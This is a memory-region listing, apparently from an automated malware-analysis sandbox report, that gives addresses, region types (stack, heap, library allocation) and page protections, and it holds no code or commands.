2797BF8000
|
stack
|
page read and write
|
||
|
18C088E8000
|
heap
|
page read and write
|
||
|
1697991F000
|
heap
|
page read and write
|
||
|
62CD000
|
stack
|
page read and write
|
||
|
18C06980000
|
heap
|
page read and write
|
||
|
7FF88790D000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC3BFE000
|
stack
|
page read and write
|
||
|
13B2000
|
trusted library allocation
|
page read and write
|
||
|
1618010A000
|
trusted library allocation
|
page read and write
|
||
|
600E000
|
stack
|
page read and write
|
||
|
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
|
18C08B37000
|
heap
|
page read and write
|
||
|
18C087F7000
|
heap
|
page read and write
|
||
|
161F4370000
|
heap
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
18C08A5B000
|
heap
|
page read and write
|
||
|
7FF887B10000
|
trusted library allocation
|
page read and write
|
||
|
18C08A39000
|
heap
|
page read and write
|
||
|
169003E1000
|
trusted library allocation
|
page read and write
|
||
|
A627CFC000
|
stack
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
7DF40ADA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
161F422C000
|
heap
|
page read and write
|
||
|
161F2020000
|
heap
|
page read and write
|
||
|
A6276FF000
|
stack
|
page read and write
|
||
|
161F425F000
|
heap
|
page read and write
|
||
|
7FF887AA2000
|
trusted library allocation
|
page read and write
|
||
|
18C088E5000
|
heap
|
page read and write
|
||
|
23B723A0000
|
heap
|
page read and write
|
||
|
161805B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
|
18C08B37000
|
heap
|
page read and write
|
||
|
59A78FF000
|
stack
|
page read and write
|
||
|
18C08B4D000
|
heap
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
18C06B20000
|
heap
|
page read and write
|
||
|
18C06981000
|
heap
|
page read and write
|
||
|
18C06977000
|
heap
|
page read and write
|
||
|
18C08802000
|
heap
|
page read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
18C08A31000
|
heap
|
page read and write
|
||
|
169003D9000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
1697994A000
|
heap
|
page read and write
|
||
|
161F2050000
|
heap
|
page read and write
|
||
|
23B0004B000
|
trusted library allocation
|
page read and write
|
||
|
59A74FF000
|
stack
|
page read and write
|
||
|
7F780000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C08B4C000
|
heap
|
page read and write
|
||
|
23B72585000
|
heap
|
page read and write
|
||
|
7FF886B7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1697B9B0000
|
heap
|
page read and write
|
||
|
18C087AB000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
7DF493F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1697995E000
|
heap
|
page read and write
|
||
|
6940000
|
trusted library allocation
|
page execute and read and write
|
||
|
161F20A0000
|
heap
|
page read and write
|
||
|
18C088BD000
|
heap
|
page read and write
|
||
|
18C0880A000
|
heap
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
161F20E0000
|
heap
|
page read and write
|
||
|
18C088AC000
|
heap
|
page read and write
|
||
|
16901929000
|
trusted library allocation
|
page read and write
|
||
|
1437000
|
heap
|
page read and write
|
||
|
23B74707000
|
heap
|
page execute and read and write
|
||
|
161F4170000
|
heap
|
page read and write
|
||
|
2797493000
|
stack
|
page read and write
|
||
|
18C06A40000
|
heap
|
page read and write
|
||
|
1610000
|
trusted library allocation
|
page execute and read and write
|
||
|
161F2340000
|
heap
|
page execute and read and write
|
||
|
18C06948000
|
heap
|
page read and write
|
||
|
7FF88791B000
|
trusted library allocation
|
page read and write
|
||
|
18C08A39000
|
heap
|
page read and write
|
||
|
59A6D56000
|
stack
|
page read and write
|
||
|
23B73EDC000
|
heap
|
page read and write
|
||
|
16900001000
|
trusted library allocation
|
page read and write
|
||
|
5FCE000
|
stack
|
page read and write
|
||
|
18C06A33000
|
heap
|
page read and write
|
||
|
A62767E000
|
stack
|
page read and write
|
||
|
58D0000
|
heap
|
page execute and read and write
|
||
|
1697B880000
|
heap
|
page execute and read and write
|
||
|
173E000
|
stack
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
56D0000
|
heap
|
page read and write
|
||
|
2797E7C000
|
stack
|
page read and write
|
||
|
5DF0000
|
heap
|
page read and write
|
||
|
18C08B87000
|
heap
|
page read and write
|
||
|
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
|
18C08A31000
|
heap
|
page read and write
|
||
|
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
|
161F22B0000
|
trusted library allocation
|
page read and write
|
||
|
161F2270000
|
heap
|
page read and write
|
||
|
58B6000
|
trusted library allocation
|
page read and write
|
||
|
CC3B7D000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page execute and read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2797A7E000
|
stack
|
page read and write
|
||
|
7FF886BD6000
|
trusted library allocation
|
page read and write
|
||
|
1618054C000
|
trusted library allocation
|
page read and write
|
||
|
18C08A28000
|
heap
|
page read and write
|
||
|
1697B580000
|
heap
|
page execute and read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
18C08A28000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
161F2187000
|
heap
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
A6278FF000
|
stack
|
page read and write
|
||
|
59A79FB000
|
stack
|
page read and write
|
||
|
27978FD000
|
stack
|
page read and write
|
||
|
A62777D000
|
stack
|
page read and write
|
||
|
7FF8879C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
169003D1000
|
trusted library allocation
|
page read and write
|
||
|
23B722C0000
|
heap
|
page read and write
|
||
|
1637000
|
heap
|
page read and write
|
||
|
12BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C08A2C000
|
heap
|
page read and write
|
||
|
7FF887AB1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
D6B000
|
stack
|
page read and write
|
||
|
18C087C2000
|
heap
|
page read and write
|
||
|
58A0000
|
trusted library allocation
|
page read and write
|
||
|
1697B8FD000
|
heap
|
page read and write
|
||
|
18C0890F000
|
heap
|
page read and write
|
||
|
5F4D000
|
stack
|
page read and write
|
||
|
23B72685000
|
heap
|
page read and write
|
||
|
16180001000
|
trusted library allocation
|
page read and write
|
||
|
1697B886000
|
heap
|
page execute and read and write
|
||
|
18C087E7000
|
heap
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
161F2295000
|
heap
|
page read and write
|
||
|
604E000
|
stack
|
page read and write
|
||
|
7FF887C60000
|
trusted library allocation
|
page read and write
|
||
|
279894D000
|
stack
|
page read and write
|
||
|
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
18C0697D000
|
heap
|
page read and write
|
||
|
A6273EE000
|
stack
|
page read and write
|
||
|
161F4167000
|
heap
|
page execute and read and write
|
||
|
116B000
|
heap
|
page read and write
|
||
|
13A0000
|
trusted library allocation
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
CC407F000
|
stack
|
page read and write
|
||
|
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
|
18C08916000
|
heap
|
page read and write
|
||
|
7FF8879BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C06A30000
|
heap
|
page read and write
|
||
|
1618088E000
|
trusted library allocation
|
page read and write
|
||
|
CC3C7E000
|
stack
|
page read and write
|
||
|
1697BCC0000
|
heap
|
page read and write
|
||
|
6690000
|
heap
|
page read and write
|
||
|
31DC000
|
stack
|
page read and write
|
||
|
56F3000
|
heap
|
page read and write
|
||
|
A6273AF000
|
stack
|
page read and write
|
||
|
18C0881E000
|
heap
|
page read and write
|
||
|
279751E000
|
stack
|
page read and write
|
||
|
23B74710000
|
heap
|
page read and write
|
||
|
23B005FA000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
10F7000
|
stack
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
1697B540000
|
heap
|
page readonly
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
16901C6F000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B90000
|
trusted library allocation
|
page read and write
|
||
|
18C08A5D000
|
heap
|
page read and write
|
||
|
23B00040000
|
trusted library allocation
|
page read and write
|
||
|
CC3D78000
|
stack
|
page read and write
|
||
|
23B74540000
|
heap
|
page read and write
|
||
|
161F2290000
|
heap
|
page read and write
|
||
|
7FF8879BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
1697B1C6000
|
heap
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C087A2000
|
heap
|
page read and write
|
||
|
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
|
A62797E000
|
stack
|
page read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
279884F000
|
stack
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
23B73E30000
|
heap
|
page read and write
|
||
|
7FF887AE2000
|
trusted library allocation
|
page read and write
|
||
|
59A76FE000
|
stack
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page read and write
|
||
|
58B0000
|
trusted library allocation
|
page read and write
|
||
|
16190001000
|
trusted library allocation
|
page read and write
|
||
|
161F20EC000
|
heap
|
page read and write
|
||
|
18C08B45000
|
heap
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
2797CFE000
|
stack
|
page read and write
|
||
|
1618001B000
|
trusted library allocation
|
page read and write
|
||
|
315D000
|
stack
|
page read and write
|
||
|
7FF886B3C000
|
trusted library allocation
|
page read and write
|
||
|
161F23D0000
|
heap
|
page read and write
|
||
|
7FF886B40000
|
trusted library allocation
|
page read and write
|
||
|
18C0880F000
|
heap
|
page read and write
|
||
|
18C087B2000
|
heap
|
page read and write
|
||
|
161F2100000
|
heap
|
page read and write
|
||
|
18C088F8000
|
heap
|
page read and write
|
||
|
7FF887910000
|
trusted library allocation
|
page read and write
|
||
|
18C08A31000
|
heap
|
page read and write
|
||
|
23B73E74000
|
heap
|
page read and write
|
||
|
1697B6BA000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
18C08A2C000
|
heap
|
page read and write
|
||
|
16979870000
|
heap
|
page read and write
|
||
|
7FF886C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
127E000
|
stack
|
page read and write
|
||
|
161F41BE000
|
heap
|
page read and write
|
||
|
18C087F2000
|
heap
|
page read and write
|
||
|
16180110000
|
trusted library allocation
|
page read and write
|
||
|
1618010D000
|
trusted library allocation
|
page read and write
|
||
|
A6279FF000
|
stack
|
page read and write
|
||
|
23B72499000
|
heap
|
page read and write
|
||
|
23B72400000
|
heap
|
page read and write
|
||
|
56AE000
|
stack
|
page read and write
|
||
|
169005FE000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
169799C5000
|
heap
|
page read and write
|
||
|
18C088D8000
|
heap
|
page read and write
|
||
|
18C08A3C000
|
heap
|
page read and write
|
||
|
1697B5C2000
|
trusted library allocation
|
page read and write
|
||
|
16901699000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC37FE000
|
stack
|
page read and write
|
||
|
18C08B52000
|
heap
|
page read and write
|
||
|
23B724D1000
|
heap
|
page read and write
|
||
|
23B73ED4000
|
heap
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
|
7FF887904000
|
trusted library allocation
|
page read and write
|
||
|
16901674000
|
trusted library allocation
|
page read and write
|
||
|
18C08B1E000
|
heap
|
page read and write
|
||
|
59A71FE000
|
stack
|
page read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C08A4E000
|
heap
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
120C000
|
heap
|
page read and write
|
||
|
16900408000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887C10000
|
trusted library allocation
|
page read and write
|
||
|
CC36B3000
|
stack
|
page read and write
|
||
|
18C08C60000
|
heap
|
page read and write
|
||
|
2797DFF000
|
stack
|
page read and write
|
||
|
169798E0000
|
heap
|
page read and write
|
||
|
169102ED000
|
trusted library allocation
|
page read and write
|
||
|
1697998A000
|
heap
|
page read and write
|
||
|
27979FE000
|
stack
|
page read and write
|
||
|
1578000
|
trusted library allocation
|
page read and write
|
||
|
13C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B005FC000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
18C08A39000
|
heap
|
page read and write
|
||
|
18C06850000
|
heap
|
page read and write
|
||
|
16979986000
|
heap
|
page read and write
|
||
|
18C087A1000
|
heap
|
page read and write
|
||
|
2797D7E000
|
stack
|
page read and write
|
||
|
161F212E000
|
heap
|
page read and write
|
||
|
161F422E000
|
heap
|
page read and write
|
||
|
1697B8B1000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
A627B7F000
|
stack
|
page read and write
|
||
|
16979790000
|
heap
|
page read and write
|
||
|
CC3F7E000
|
stack
|
page read and write
|
||
|
16979909000
|
heap
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page read and write
|
||
|
23B74450000
|
heap
|
page execute and read and write
|
||
|
7FF887C10000
|
trusted library allocation
|
page read and write
|
||
|
CC40FE000
|
stack
|
page read and write
|
||
|
1690169D000
|
trusted library allocation
|
page read and write
|
||
|
18C06B25000
|
heap
|
page read and write
|
||
|
13BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1690100E000
|
trusted library allocation
|
page read and write
|
||
|
18C08A5B000
|
heap
|
page read and write
|
||
|
18C08B7E000
|
heap
|
page read and write
|
||
|
1691007E000
|
trusted library allocation
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
27988CE000
|
stack
|
page read and write
|
There are 623 hidden memdumps, click here to show them.